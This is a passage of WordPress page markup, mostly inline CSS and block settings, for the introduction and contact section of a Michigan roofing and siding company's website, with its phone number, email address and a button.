976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0f159bdd-7f31-4f5d-8116-79161efa80a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"426cabfe-a2cd-4360-aecf-17fd567995fe\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-426cabfe-a2cd-4360-aecf-17fd567995fe background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"6a199a30-74a8-487c-b888-156f1279eaf9\"} -->\n<style type=\"text/css\"> .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6a199a30-74a8-487c-b888-156f1279eaf9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"5a7066fe-d425-4153-8844-d8ae7a4116af\"} -->\n<style type=\"text/css\"> .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5a7066fe-d425-4153-8844-d8ae7a4116af\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"6836f24b-2686-4a49-bdc2-b859683a37cf\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"2019a28c-9fe4-4261-8545-472fe8f25e18\"} -->\n<style type=\"text/css\"> .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2019a28c-9fe4-4261-8545-472fe8f25e18\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"eb27f5f4-746e-46f7-8c6c-1546ed348b06\"} -->\n<style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 